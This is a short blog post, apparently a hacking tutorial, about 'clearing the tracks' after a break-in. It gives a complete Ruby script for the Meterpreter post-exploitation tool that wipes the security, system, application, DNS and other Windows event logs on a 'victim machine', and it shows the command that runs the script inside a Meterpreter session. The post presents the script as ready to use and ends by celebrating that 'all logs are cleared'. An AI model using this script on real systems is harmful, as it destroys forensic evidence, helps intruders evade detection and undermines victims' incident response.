In the last step of Hacking, we know that we need to "clear the tracks" or known as "housekeeping". If you use meterpreter payload, you could run this script to clear the logs on the victim machine:
ClearLogs.rb
# Clears Windows Event Logs
evtlogs = [
'security',
'system',
'application',
'directory service',
'dns server',
'file replication service'
]
puts ("Clearing Event Logs, this will leave an event 517")
evtlogs.each do |evl|
puts ("Clearing the #{evl} Event Log")
log = client.sys.eventlog.open(evl)
log.clear
end
puts ("All Clear! You are a Ninja!")
Save it and call it within the meterpreter.
meterpreter > run clearlogs
and Bingo! all logs are cleared...
No comments:
Post a Comment